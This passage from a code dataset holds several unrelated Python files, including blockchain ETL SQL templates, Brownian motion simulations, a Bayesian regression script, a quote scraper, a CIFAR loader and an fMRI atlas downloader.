_st_day, blknum, txhash, txpos, from_address,\n COALESCE(to_address, receipt_contract_address) AS to_address,\n round(CASE receipt_status WHEN null THEN value WHEN 1 THEN value ELSE 0 END)::text AS value,\n receipt_status AS status\nFROM\n \"{{chain}}\".txs\nWHERE\n block_timestamp >= '{{st_timestamp}}' AND block_timestamp <= '{{et_timestamp}}'\n AND blknum >= {{st_blknum}} AND blknum <= {{et_blknum}}\n AND from_address is not null\n\"\"\"\n)\n\nREAD_TX_TEMPLATE = Template(\n \"\"\"\nSELECT DISTINCT\n _st, _st_day, blknum, txhash, txpos, from_address, to_address,\n round(value)::text AS value,\n round(\n receipt_gas_used::numeric\n *\n COALESCE(receipt_effective_gas_price, gas_price)::numeric\n )::text AS fee_value\nFROM\n \"{{chain}}\".txs\nWHERE\n block_timestamp >= '{{st_timestamp}}' AND block_timestamp <= '{{et_timestamp}}'\n AND blknum >= {{st_blknum}} AND blknum <= {{et_blknum}}\n{%- if chain == 'cronos' %}\n AND receipt_gas_used is not null\n{%- endif -%}\n\"\"\"\n)\n\nREAD_FULL_TRACE_TEMPLATE = Template(\n \"\"\"\nWITH txs AS (\n SELECT DISTINCT\n _st, _st_day, blknum, txhash, txpos, from_address, to_address, value,\n receipt_gas_used AS gas_used, receipt_effective_gas_price AS gas_price\n FROM\n \"{{chain}}\".txs\n WHERE\n block_timestamp >= '{{st_timestamp}}' AND block_timestamp <= '{{et_timestamp}}'\n AND blknum >= {{st_blknum}} AND blknum <= {{et_blknum}}\n AND txhash is not null\n),\ntraces AS (\n SELECT DISTINCT\n _st, _st_day, blknum, txhash, txpos, from_address, to_address, value, trace_address, status\n FROM\n \"{{chain}}\".traces\n WHERE\n block_timestamp >= '{{st_timestamp}}' AND block_timestamp <= '{{et_timestamp}}'\n AND blknum >= {{st_blknum}} AND 
blknum <= {{et_blknum}}\n AND trace_type <> 'reward' -- use block_rewards instead\n AND (call_type is null OR call_type NOT IN ('callcode', 'staticcall', 'delegatecall'))\n),\nblock_rewards AS (\n SELECT\n *\n FROM\n \"{{chain}}\".block_rewards\n WHERE\n _st_day IN (\n {%- for d in dates -%}'{{d}}'{%- if not loop.last -%}, {% endif -%}{%- endfor -%}\n )\n AND blknum >= {{st_blknum}} AND blknum <= {{et_blknum}}\n),\nminer_stats AS (\n SELECT\n _st,\n _st_day,\n blknum,\n miner AS address,\n reward AS value\n FROM\n block_rewards\n UNION ALL\n SELECT\n _st,\n _st_day,\n blknum,\n uncle0_miner AS address,\n uncle0_reward AS value\n FROM\n block_rewards\n UNION ALL\n SELECT\n _st,\n _st_day,\n blknum,\n uncle1_miner AS address,\n uncle1_reward AS value\n FROM\n block_rewards\n),\ncnb_stats AS (\n SELECT\n address AS cnb_address,\n count(distinct blknum) AS cnb_blocks,\n count(*) AS cnb_txs,\n count(*) AS cnb_xfers,\n min(_st) AS cnb_1th_st,\n max(_st) AS cnb_nth_st,\n sum(value) AS cnb_value,\n min(blknum) AS cnb_1th_blknum,\n max(blknum) AS cnb_nth_blknum,\n min(_st_day) AS cnb_1th_st_day,\n max(_st_day) AS cnb_nth_st_day\n FROM\n miner_stats\n GROUP BY\n 1\n),\nvin_stats AS (\n SELECT\n to_address AS vin_address,\n count(distinct blknum) AS vin_blocks,\n count(distinct txhash) AS vin_txs,\n count(*) AS vin_xfers,\n sum(CASE status WHEN 1 THEN value ELSE 0 END) AS vin_value,\n min(_st) AS vin_1th_st,\n max(_st) AS vin_nth_st,\n min(blknum) AS vin_1th_blknum,\n max(blknum) AS vin_nth_blknum,\n min(_st_day) AS vin_1th_st_day,\n max(_st_day) AS vin_nth_st_day\n FROM\n traces\n GROUP BY\n 1\n),\nfee_stats AS (\n SELECT\n from_address AS out_address,\n sum(gas_used * gas_price::numeric) AS fee_value\n FROM\n txs\n GROUP BY\n 1\n),\nout_stats AS (\n SELECT\n A.from_address AS out_address,\n count(distinct A.blknum) AS out_blocks,\n count(distinct A.txhash) AS out_txs,\n count(*) AS out_xfers,\n sum(CASE A.status WHEN 1 THEN A.value ELSE 0 END) AS out_value,\n min(A._st) AS out_1th_st,\n max(A._st) AS out_nth_st,\n min(A.blknum) AS out_1th_blknum,\n max(A.blknum) AS out_nth_blknum,\n min(A._st_day) AS out_1th_st_day,\n max(A._st_day) AS out_nth_st_day\n FROM\n traces A\n LEFT JOIN txs B ON\n A.txhash = B.txhash\n GROUP BY\n 1\n),\ninout_flows AS (\n SELECT\n COALESCE(A.cnb_address, B.vin_address, C.out_address) AS address,\n A.*,\n B.*,\n C.*,\n D.fee_value\n FROM\n cnb_stats A\n FULL JOIN vin_stats B ON A.cnb_address = B.vin_address\n FULL JOIN out_stats C ON A.cnb_address = C.out_address\n LEFT JOIN fee_stats D ON C.out_address = D.out_address\n)\n\n-- FULL JOIN may return multi columns for the same address(_st_day maybe null)\nSELECT\n address, blknum,\n out_blocks, vin_blocks, cnb_blocks,\n out_txs, vin_txs, cnb_txs,\n out_xfers, vin_xfers, cnb_xfers,\n out_value::TEXT AS out_value,\n vin_value::TEXT AS vin_value,\n cnb_value::TEXT AS cnb_value,\n fee_value::TEXT AS fee_value,\n out_1th_st, vin_1th_st, cnb_1th_st, out_nth_st, vin_nth_st, cnb_nth_st,\n out_1th_blknum, vin_1th_blknum, cnb_1th_blknum, out_nth_blknum, vin_nth_blknum, cnb_nth_blknum,\n out_1th_st_day, vin_1th_st_day, cnb_1th_st_day, out_nth_st_day, vin_nth_st_day, cnb_nth_st_day,\n (vin_value + cnb_value - out_value - fee_value)::TEXT AS value\nFROM (\n SELECT\n address,\n {{et_blknum}} AS blknum,\n\n sum(COALESCE(out_blocks, 0))::BIGINT AS out_blocks,\n sum(COALESCE(vin_blocks, 0))::BIGINT AS vin_blocks,\n sum(COALESCE(cnb_blocks, 0))::BIGINT AS cnb_blocks,\n\n sum(COALESCE(out_txs, 0))::BIGINT AS out_txs,\n sum(COALESCE(vin_txs, 
0))::BIGINT AS vin_txs,\n sum(COALESCE(cnb_txs, 0))::BIGINT AS cnb_txs,\n\n sum(COALESCE(out_xfers, 0))::BIGINT AS out_xfers,\n sum(COALESCE(vin_xfers, 0))::BIGINT AS vin_xfers,\n sum(COALESCE(cnb_xfers, 0))::BIGINT AS cnb_xfers,\n\n sum(COALESCE(out_value, 0))::NUMERIC AS out_value,\n sum(COALESCE(vin_value, 0))::NUMERIC AS vin_value,\n sum(COALESCE(cnb_value, 0))::NUMERIC AS cnb_value,\n sum(COALESCE(fee_value, 0))::NUMERIC AS fee_value,\n\n min(out_1th_st) AS out_1th_st,\n min(vin_1th_st) AS vin_1th_st,\n min(cnb_1th_st) AS cnb_1th_st,\n max(out_nth_st) AS out_nth_st,\n max(vin_nth_st) AS vin_nth_st,\n max(cnb_nth_st) AS cnb_nth_st,\n\n min(out_1th_blknum) AS out_1th_blknum,\n min(vin_1th_blknum) AS vin_1th_blknum,\n min(cnb_1th_blknum) AS cnb_1th_blknum,\n max(out_nth_blknum) AS out_nth_blknum,\n max(vin_nth_blknum) AS vin_nth_blknum,\n max(cnb_nth_blknum) AS cnb_nth_blknum,\n\n min(out_1th_st_day) AS out_1th_st_day,\n min(vin_1th_st_day) AS vin_1th_st_day,\n min(cnb_1th_st_day) AS cnb_1th_st_day,\n max(out_nth_st_day) AS out_nth_st_day,\n max(vin_nth_st_day) AS vin_nth_st_day,\n max(cnb_nth_st_day) AS cnb_nth_st_day\n FROM\n inout_flows\n WHERE\n address is not null -- in case the block reward data is missing\n GROUP BY\n 1\n) _\n \"\"\"\n)\n\nREAD_LOG_TEMPLATE = Template(\n \"\"\"\nSELECT DISTINCT\n _st, _st_day, blknum, txhash, txpos, logpos, address, topics, data\nFROM\n \"{{chain}}\".logs\nWHERE\n block_timestamp >= '{{st_timestamp}}' AND block_timestamp <= '{{et_timestamp}}'\n AND blknum >= {{st_blknum}} AND blknum <= {{et_blknum}}\n{% if topics %}\n AND split_part(topics, ',', 1) IN (\n {%- for t in topics -%}'{{t}}'{%- if not loop.last -%}, {% endif -%}{%- endfor -%}\n )\n{% endif %}\n{% if addresses %}\n AND address IN (\n {%- for a in addresses -%}'{{a}}'{%- if not loop.last -%}, {% endif -%}{%- endfor -%}\n )\n{% endif %}\n\"\"\"\n)\n","repo_name":"jsvisa/blockchain-etl","sub_path":"ethereumetl/misc/eth_extract_balance.py","file_name":"eth_extract_balance.py","file_ext":"py","file_size_in_byte":9563,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"5950289541","text":"import math\nimport random\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\"\"\"\"\nmodel the path of a particle undergoing Brownian motion\n\"\"\"\n\nrandom.seed(0)\n\n\ndef wiener1(M, t):\n \"\"\"\n simulate a path of a particle undergoing Brownian motion for time [0; 1]\n :param M: number of additions\n :param t: time\n :param n: number of time steps\n :return: a list of M+1 values of the path of a particle undergoing Brownian motion\n \"\"\"\n eta_0 = random.gauss(0, 1)\n etas = [random.gauss(0, 1) for _ in range(M)]\n res = eta_0 * t + math.sqrt(2) * sum(\n [etas[i - 1] * math.sin(i * math.pi * t) / (i * math.pi) for i in range(1, M + 1)])\n return res\n\n\ndef wiener2(M, t):\n \"\"\"\n simulate a path of a particle undergoing Brownian motion for time [0; 1]\n :param M: number of additions\n :param t: time\n :return: a list of M+1 values of the path of a particle undergoing Brownian motion\n \"\"\"\n eta_0 = random.gauss(0, 1)\n etas_1 = [random.gauss(0, 1) for _ in range(M)]\n etas_2 = [random.gauss(0, 1) for _ in range(M)]\n res = eta_0 * t + math.sqrt(2) * sum([etas_1[i - 1] * math.sin(2 * i * math.pi * t) / (2 * i * math.pi) +\n etas_2[i - 1] * (1 - math.cos(2 * i * math.pi * t)) / (2 * i * math.pi)\n for i in range(1, M + 1)])\n return res\n\n\ndef variation(sequence_):\n return np.cumsum(abs(np.diff(sequence_, axis=0, 
prepend=0.)), axis=0)\n\n\nif __name__ == '__main__':\n n = 100\n the_value = 1\n time = [x / n for x in range(n + 1)] # time from 0 to 1 in 1000 steps\n\n # plot the graph\n plt.figure(figsize=(10, 4))\n samples = 100\n variations = []\n means = []\n reach_the_value = []\n for j in range(samples):\n print(f\"{j} / {samples}\")\n sequence = [wiener1(1000, t) for t in time]\n variations.append(variation(sequence))\n mean = sum(sequence) / len(sequence)\n means.append(mean)\n above_the_value = [x for x in sequence if x > the_value]\n time_to_reach_the_value = 1 if len(above_the_value) == 0 else sequence.index(above_the_value[0]) / n\n reach_the_value.append(time_to_reach_the_value)\n plt.plot(time, sequence)\n\n plt.xlabel('time')\n plt.ylabel('position')\n plt.show()\n\n # plot the quadratic variation\n plt.figure(figsize=(10, 4))\n for j in range(samples):\n plt.plot(time, variations[j])\n plt.xlabel('time')\n plt.ylabel('quadratic variation')\n plt.show()\n\n # plot the means\n plt.figure(figsize=(10, 4))\n plt.plot([x for x in range(samples)], means)\n plt.xlabel('sample')\n plt.ylabel('mean')\n plt.show()\n\n # plot the time to reach the value\n plt.figure(figsize=(10, 4))\n plt.plot([x for x in range(samples)], reach_the_value)\n # plot the mean time to reach the value\n plt.plot([x for x in range(samples)], [sum(reach_the_value) / len(reach_the_value) for _ in range(samples)])\n plt.xlabel('sample')\n plt.ylabel(f'time to reach the value a={the_value}')\n plt.show()\n","repo_name":"sasha0503/lab_stat_modelling_2","sub_path":"wiener.py","file_name":"wiener.py","file_ext":"py","file_size_in_byte":3069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"30092423604","text":"import numpy as np\n\ndef GetBackwardMA( In, wl ):\n\n InSize=In.shape\n NSize=InSize[0]\n nb=NSize\n\n Backward=np.zeros(nb, dtype=np.float16)\n\n # Apply moving averages based on number of dimensions (1-3)\n\n tmp=np.roll(In, -(wl-1))\n\n tmp=np.concatenate( ( tmp[nb-(wl-1):nb],tmp ) )\n\n \n for i in range(0, nb):\n \n Backward[i]=tmp[i:i+wl-1].sum()\n \n \n\n Backward=Backward/wl\n\n return Backward\n","repo_name":"gina-alaska/emodis_ndvi_python","sub_path":"pycodes/getbackwardma.py","file_name":"getbackwardma.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"13318463323","text":"import sys\nimport pandas as pd\nimport numpy as np\nfrom sklearn.linear_model import BayesianRidge\nfrom sklearn.model_selection import RandomizedSearchCV\n\n#submit base file name\nfile_input = sys.argv[1]\n\n#sklearn Bayesian\nbase_regressor = BayesianRidge()\nlog_base_regressor = BayesianRidge()\n\ntuned_regressor = BayesianRidge()\nlog_tuned_regressor = BayesianRidge()\n\n#File Names from Base Name\ntrain_suffix = '_train.csv'\nvalidate_suffix = '_validate.csv'\ntest_suffix = '_test.csv'\n\n#Read Data from File\ndf_train = pd.read_csv(file_input + train_suffix)\ndf_validate = pd.read_csv(file_input + validate_suffix)\ndf_test = pd.read_csv(file_input + test_suffix)\n\n#Get the Features X into one Matrix and extract what we're looking for\ntrain_x, train_y, log_train_y = df_train.drop(columns=['Amount','log_Amount']), df_train['Amount'], df_train['log_Amount']\n\n#Finding Bayesian Hyperparameters\nbayesian_param = {\n 'alpha_1': np.linspace(1e-2,4,num=100),\n 'alpha_2': np.linspace(1e-2,4,num=100),\n 'lambda_1': np.linspace(1e-2,4,num=100),\n 
'lambda_2':np.linspace(1e-2,4,num=100)\n}\n\n#Randomized Search to find the best hyperparameters\nbase_regressor.fit(train_x,train_y)\nlog_base_regressor.fit(train_x, log_train_y)\n\n#Randomized Search to find the best hyperparameters\ntuned_cv = RandomizedSearchCV(tuned_regressor, param_distributions=bayesian_param,n_iter=100, cv=10, verbose=1,n_jobs=10,random_state=1)\ntuned_cv.fit(train_x,train_y)\ntuned_param = tuned_cv.best_params_\n\nlog_tuned_cv = RandomizedSearchCV(log_tuned_regressor, param_distributions=bayesian_param,n_iter=100, cv=10, verbose=1,n_jobs=10,random_state=1)\nlog_tuned_cv.fit(train_x,log_train_y)\nlog_tuned_param = log_tuned_cv.best_params_\n\n#Model with hyperparamters\ntuned_model = BayesianRidge(alpha_1 = tuned_param['alpha_1'], alpha_2 = tuned_param['alpha_2'], lambda_1 = tuned_param['lambda_1'], lambda_2 = tuned_param['lambda_2'])\ntuned_model.fit(train_x,train_y)\n\n#Log model with hyperparameters\nlog_tuned_model = BayesianRidge(alpha_1 = log_tuned_param['alpha_1'], alpha_2 = log_tuned_param['alpha_2'], lambda_1 = log_tuned_param['lambda_1'], lambda_2 = log_tuned_param['lambda_2'])\nlog_tuned_model.fit(train_x, log_train_y)\n\n#Extract Data from the Validation data set to train the hyperparameter\nvalidate_x, validate_y, log_validate_y = df_validate.drop(columns=['Amount','log_Amount']), df_validate['Amount'], df_validate['log_Amount']\n\n#Here we compare validate our model to see which one is the best in this dataset.\nbase_predict_validate = base_regressor.predict(validate_x)\nlog_predict_validate = log_base_regressor.predict(validate_x)\ntuned_predict_validate = tuned_model.predict(validate_x)\nlog_tuned_predict_validate = log_tuned_model.predict(validate_x)\n\nbase_predict_data = {'validate_y':validate_y,'base_predict':base_predict_validate}\ndf_base_predict = pd.DataFrame(base_predict_data)\n\nlog_predict_data = {'log_validate_y':log_validate_y,'base_predict':log_predict_validate}\ndf_log_base_predict = pd.DataFrame(log_predict_data)\n\ntuned_predict_data = {'validate_y':validate_y,'base_predict':tuned_predict_validate}\ndf_tuned_predict = pd.DataFrame(tuned_predict_data)\n\nlog_tuned_predict_data = {'validate_y':validate_y,'base_predict':log_tuned_predict_validate}\ndf_log_tuned_predict = pd.DataFrame(log_tuned_predict_data)\n\n","repo_name":"albuut/Medical-Malpractice-Analysis","sub_path":"bayesian_regression.py","file_name":"bayesian_regression.py","file_ext":"py","file_size_in_byte":3301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"7176251825","text":"import requests\nimport bs4 \n\nauthor_list = set()\nquotes_list = []\ntags_list = set()\n\npage = 1\n\nwhile True:\n response = requests.get(f'http://quotes.toscrape.com/page/{page}/')\n soap = bs4.BeautifulSoup(response.text,'lxml')\n page += 1\n\n if 'No quotes found!' 
in soap.text:\n break\n\n for author in soap.select('.author'):\n author_list.add(author.text +'\\n') \n\n for quote in soap.select('.quote > span.text'):\n quotes_list.append(quote.text +'\\n') \n\n for tag in soap.select('.tag-item > .tag'):\n tags_list.add(tag.text +'\\n')\n\n \n \n\nwith open('./file/authors.txt','w') as t:\n t.write(\"\".join(author_list))\n\nwith open('./file/quotes.txt','w',encoding='utf-8') as t:\n t.write(\"\".join(quotes_list))\n\nwith open('./file/tags.txt','w') as t:\n t.write(\"\".join(tags_list))\n","repo_name":"Yeasiin/quotes_scrape","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"158700877","text":"import math\n\n# ---------- works with current notes with insert(i,x) inserting left of i ----------\n\nclass RotateArray:\n def __init__(self,n) -> None:\n self.arrays = []\n left = n\n nsqrt = math.ceil(math.sqrt(n))\n self.nsqrt = nsqrt\n while left > nsqrt:\n self.arrays.append([None for _ in range(nsqrt)])\n left -= nsqrt\n self.arrays.append([None for _ in range(nsqrt)])\n self.offsets = [0 for _ in range(len(self.arrays))]\n\n def get(self,i):\n r = i // self.nsqrt\n k = ((i % self.nsqrt) + self.offsets[r]) % self.nsqrt\n return self.arrays[r][k]\n\n def insert(self,i,x):\n r = i // self.nsqrt\n k = (i % self.nsqrt)\n self.__prop_over(r+1,self.arrays[r][self.offsets[r]-1])\n self.__rebuild_ins(r,k,x)\n\n def delete(self,i,):\n r = i // self.nsqrt\n k = (i % self.nsqrt)\n self.__rebuild__del(r,k)\n self.__prop_under(r+1)\n \n def __rebuild_ins(self,r,k,x):\n new = [None] * (self.nsqrt + 1)\n for i in range(self.nsqrt):\n oldindex = ((i % self.nsqrt) + self.offsets[r]) % self.nsqrt\n if i < k:\n new[i] = self.arrays[r][oldindex]\n elif i == k:\n new[k] = x\n new[i+1] = self.arrays[r][oldindex]\n else:\n new[i+1] = self.arrays[r][oldindex]\n self.arrays[r] = new[0:self.nsqrt]\n self.offsets[r] = 0\n \n def __rebuild__del(self,r,k):\n new = [None] * self.nsqrt\n for i in range(self.nsqrt):\n oldindex = ((i % self.nsqrt) + self.offsets[r]) % self.nsqrt\n if i < k:\n new[i] = self.arrays[r][oldindex]\n elif i > k:\n new[i-1] = self.arrays[r][oldindex]\n self.arrays[r] = new\n self.offsets[r] = 0\n \n def __prop_over(self,r,x):\n if x is None or r >= len(self.arrays): return\n tmp = self.arrays[r][self.offsets[r]]\n if tmp is not None:\n self.offsets[r] = (self.offsets[r] - 1) % self.nsqrt\n self.__prop_over(r+1,self.arrays[r][self.offsets[r]])\n self.arrays[r][self.offsets[r]] = x\n\n def __prop_under(self,r):\n if r >= len(self.arrays): return\n x = self.arrays[r][self.offsets[r]]\n if x is None: return\n self.arrays[r-1][self.offsets[r-1] - 1] = x\n self.arrays[r][self.offsets[r]] = None\n self.offsets[r] = (self.offsets[r] + 1) % self.nsqrt\n self.__prop_under(r+1)\n\n\n def __str__(self) -> str:\n\n return str(sum([[r[(i + o) % len(r)] for i in range(0,len(r)) if r[(i + o) % len(r)] is not None] for o,r in zip(self.offsets,self.arrays)],start=[]))\n\n def __repr__(self) -> str:\n return self.__str__()\n\n\n ","repo_name":"s194042/Algo2Helpers","sub_path":"RotatedArrays.py","file_name":"RotatedArrays.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"6407573408","text":"import pickle\nimport numpy as np\nimport os\nfrom urllib.request import urlretrieve\nimport tarfile\nimport zipfile\nimport sys\nimport 
hickle\n\nimport deepdish\n\ndef loadbatchdata(name=\"train\"):\n x = None\n y = None\n\n hdfdata = []\n\n #maybe_download_and_extract()\n\n folder_name = \"cifar_10\"\n\n f = open('./data_set/'+folder_name+'/batches.meta', 'rb')\n f.close()\n\n if name is \"train\":\n for i in range(5):\n f = open('./data_set/'+folder_name+'/data_batch_' + str(i + 1), 'rb')\n datadict = pickle.load(f, encoding='latin1')\n\n hdfdata.append(datadict)\n\n hickle.dump(datadict, 'train'+str(i)+'.hkl', mode='w')\n\n #datadict = hickle.load(f)\n\n f.close()\n\n _X = datadict[\"data\"]\n _original_image = _X\n _Y = datadict['labels']\n\n _X = np.array(_X, dtype=float) / 255.0\n _X = _X.reshape([-1, 3, 32, 32])\n _X = _X.transpose([0, 2, 3, 1])\n _X = _X.reshape(-1, 32*32*3)\n\n if x is None:\n x = _X\n y = _Y\n original_image = _original_image\n else:\n x = np.concatenate((x, _X), axis=0)\n y = np.concatenate((y, _Y), axis=0)\n original_image = np.concatenate((original_image, _original_image), axis=0)\n\n elif name is \"test\":\n f = open('./data_set/'+folder_name+'/test_batch', 'rb')\n datadict = pickle.load(f, encoding='latin1')\n f.close()\n\n hickle.dump(datadict, 'test.hkl', mode='w')\n\n x = datadict[\"data\"]\n y = np.array(datadict['labels'])\n original_image = x\n x = np.array(x, dtype=float) / 255.0\n x = x.reshape([-1, 3, 32, 32])\n x = x.transpose([0, 2, 3, 1])\n x = x.reshape(-1, 32*32*3)\n hickle.dump(datadict, 'test' + '.hkl', mode='w')\n\n\n print(len(hdfdata))\n if name is \"train\":\n hickle.dump(hdfdata, 'train.hkl', mode='w')\n elif name is \"test\":\n hickle.dump(hdfdata, 'test.hkl', mode='w')\n\n #print(datadict.size)\n\n\n return x, dense_to_one_hot(y), original_image\n\n\ndef dense_to_one_hot(labels_dense, num_classes=10):\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot\n\n\nif __name__ == \"__main__\":\n loadbatchdata(\"test\")\n","repo_name":"hbzhang/holodeep","sub_path":"holodeep/tensorflow-cifar-10/loadbatchdata.py","file_name":"loadbatchdata.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"37526346202","text":"from __future__ import print_function\n\nimport argparse\nimport glob\nimport os\nimport shutil\nimport hashlib\nimport zipfile\n\ntry:\n from urllib.request import urlretrieve\nexcept ImportError:\n from urllib import urlretrieve\n\nimport joblib\nimport numpy as np\nimport pandas as pd\n\nATLAS = ('basc064', 'basc122', 'basc197', 'craddock_scorr_mean',\n 'harvard_oxford_cort_prob_2mm', 'msdl', 'power_2011')\n\nARCHIVE = {atlas: 'https://storage.ramp.studio/autism/{}.zip'.format(atlas)\n for atlas in ATLAS}\n\nCHECKSUM = {\n 'basc064':\n '63dfe270cbe8e5fd9d70ff88e4bd7d053b68a98eea96bacf316f7f35bce2133f',\n 'basc122':\n 'fae1de1c3bd72493d32da7378d0f4f5595f7e7ebe07a5f2402ec3afc0cfa2d47',\n 'basc197':\n 'f1692b9e2ed6017b26d2731c785f6b3e66348eb4ecae9eb3cbdb7a69419ea77d',\n 'craddock_scorr_mean':\n '8952d5350812cb0e77e99187ef9eac6b67681057783e6154a4eee13eda5c8068',\n 'harvard_oxford_cort_prob_2mm':\n '93a88bf18ba13f9851b5a20a42a40c84d03b4ab42ca3b48a28581b07d90dd351',\n 'msdl':\n '4861c118d72ad5824594d2b9e601029dc3edde6f10e72bd9475742068475f4b3',\n 'power_2011':\n '1a94384d3f0b6ea313dfc1f72005175f8546e5d82971e765b114c31c487a645c'}\n\n\ndef _sha256(path):\n \"\"\"Calculate the sha256 hash of the 
file at path.\"\"\"\n sha256hash = hashlib.sha256()\n chunk_size = 8192\n with open(path, \"rb\") as f:\n while True:\n buffer = f.read(chunk_size)\n if not buffer:\n break\n sha256hash.update(buffer)\n return sha256hash.hexdigest()\n\n\ndef _check_and_unzip(output_file, atlas, atlas_directory):\n checksum_download = _sha256(output_file)\n if checksum_download != CHECKSUM[atlas]:\n os.remove(output_file)\n raise IOError('The file downloaded was corrupted. Try again '\n 'to execute this script.')\n\n print('Decompressing the archive ...')\n zip_ref = zipfile.ZipFile(output_file, 'r')\n zip_ref.extractall(atlas_directory)\n zip_ref.close()\n\n\ndef _download_fmri_data(atlas):\n print('Downloading the data from {} ...'.format(ARCHIVE[atlas]))\n output_file = os.path.abspath(\n os.path.join('.', 'data', 'fmri', atlas + '.zip'))\n urlretrieve(ARCHIVE[atlas], filename=output_file)\n atlas_directory = os.path.abspath(os.path.join('.', 'data', 'fmri'))\n _check_and_unzip(output_file, atlas, atlas_directory)\n\n\ndef _check_integrity_atlas(atlas):\n # check that the folder is existing\n atlas_directory = os.path.abspath(os.path.join('.', 'data', 'fmri', atlas))\n if os.path.isdir(atlas_directory):\n # compute the hash of the current data present on the disk\n filenames_atlas_current = np.array(\n glob.glob(os.path.join(atlas_directory, '*', '*', '*')),\n dtype=object)\n filenames_atlas_current.sort()\n current_hash = joblib.hash(filenames_atlas_current)\n\n # compute the expected hash from the data set which we provide\n filenames_atlas_expected = pd.read_csv(\n os.path.abspath(os.path.join('.', 'data', 'fmri_filename.csv')),\n index_col=0)[atlas].values\n for idx in range(filenames_atlas_expected.size):\n filenames_atlas_expected[idx] = os.path.abspath(\n os.path.join('data', filenames_atlas_expected[idx]))\n filenames_atlas_expected.sort()\n expected_hash = joblib.hash(filenames_atlas_expected)\n\n if current_hash == expected_hash:\n return\n\n shutil.rmtree(atlas_directory)\n\n _download_fmri_data(atlas)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Download the time series extracted from the '\n 'functional MRI data using a specific atlas.')\n parser.add_argument('atlas',\n default='all',\n help='Name of the atlas. One of {}. To download '\n 'all atlases, use \"all\".'.format(ATLAS))\n atlas = parser.parse_args().atlas\n\n if atlas == 'all':\n for single_atlas in ATLAS:\n _check_integrity_atlas(single_atlas)\n elif atlas in ATLAS:\n _check_integrity_atlas(atlas)\n else:\n raise ValueError(\"'atlas' should be one of {}. 
Got {} instead.\"\n .format(ATLAS, atlas))\n\n print('Downloading completed ...')\n","repo_name":"mahmud83/autism","sub_path":"download_data.py","file_name":"download_data.py","file_ext":"py","file_size_in_byte":4293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"60"} +{"seq_id":"23373306725","text":"import pandas as pd\nimport re\nimport datetime\nfrom tabulate import tabulate\n\nlink_dataset = {\n\"Информация о местных администрациях внутригородских муниципальных образований Санкт-Петербурга (Версия №15 от 17.03.2021)\":\n [\"https://classif.gov.spb.ru/irsi/7842140523-informaciya-o-mestnyh-administraciyah-vnutrigorodskih-municipalnyh-obrazovanij-sankt-peterburga/structure_version/218/\",\n \"dataset/informaciya-o-mestnyh-administraciyah-vnutrigorodskih-municipalnyh-obrazovanij-sankt-peterburga.csv\",\n \"Телефон\"],\n\"Информация о муниципальных советах внутригородских муниципальных образований Санкт-Петербурга (Версия №14 от 17.03.2021)\":\n [\"https://classif.gov.spb.ru/irsi/7842140523-informaciya-o-municipalnyh-sovetah-vnutrigorodskih-municipalnyh-obrazovanij-sankt-peterburga/structure_version/220/\",\n \"dataset/informaciya-o-municipalnyh-sovetah-vnutrigorodskih-municipalnyh-obrazovanij-sankt-peterburga.csv\",\n \"телефон\"],\n\"Информация о спортивной подготовке детей и молодежи в Санкт-Петербурге (Версия №11 от 02.03.2021)\":\n [\"https://classif.gov.spb.ru/irsi/7830002078-Informaciya-o-sportivnoj-podgotovke-detej-i-molodezhi-v-Sankt-Peterburge/structure_version/350/?page=3&per_page=50\",\n \"dataset/Informaciya-o-sportivnoj-podgotovke-detej-i-molodezhi-v-Sankt-Peterburge.csv\",\n \"Телефон\"],\n\"Перечень государственных учреждений по делам молодежи в Санкт-Петербурге (Версия №11 от 02.03.2021)\":\n [\"https://classif.gov.spb.ru/irsi/7830002078-Perechen-gosudarstvennyh-uchrezhdenij-po-delam-molodezhi-v-Sankt-Peterburge/structure_version/357/?page=1&per_page=50\",\n \"dataset/Perechen-gosudarstvennyh-uchrezhdenij-po-delam-molodezhi-v-Sankt-Peterburge.csv\",\n \"Телефон\"],\n\"Перечень государственных учреждений, подведомственных Комитету по социальной политике Санкт-Петербурга (Версия №11 от 16.03.2021)\":\n [\"https://classif.gov.spb.ru/irsi/7825675663-perechen-gosudarstvennyh-uchrezhdenij-podvedomstvennyh-Komitetu-po-socialnoj-politike-Sankt-Peterburga/structure_version/171/?page=1&per_page=50\",\n \"dataset/perechen-gosudarstvennyh-uchrezhdenij-podvedomstvennyh-Komitetu-po-socialnoj-politike-Sankt-Peterburga.csv\",\n \"Телефон\"],\n\"Перечень государственных учреждений культуры на территории района Санкт-Петербурга (Версия №14 от 12.03.2021)\":\n [\"https://classif.gov.spb.ru/irsi/7830002078-Perechen-gosudarstvennyh-uchrezhdenij-kultury-na-territorii-rajona-Sankt-Peterburga/structure_version/324/?page=5&per_page=50\",\n \"dataset/Perechen-gosudarstvennyh-uchrezhdenij-kultury-na-territorii-rajona-Sankt-Peterburga.csv\",\n \"Телефон\"],\n\"Точки продаж билетов для проезда на наземном городском пассажирском транспорте (Версия №24 от 19.03.2021)\":\n [\"https://classif.gov.spb.ru/irsi/7830001067-tochki-prodazh-biletov-dlya-proezda-na-nazemnom-gorodskom-passazhirskom-transporte/structure_version/619/?page=1&per_page=50\",\n \"dataset/tochki-prodazh-biletov-dlya-proezda-na-nazemnom-gorodskom-passazhirskom-transporte.csv\",\n \"Телефон\"],\n\"Образовательные учреждения в сфере культуры (Версия №11 от 02.03.2021)\":\n [\n 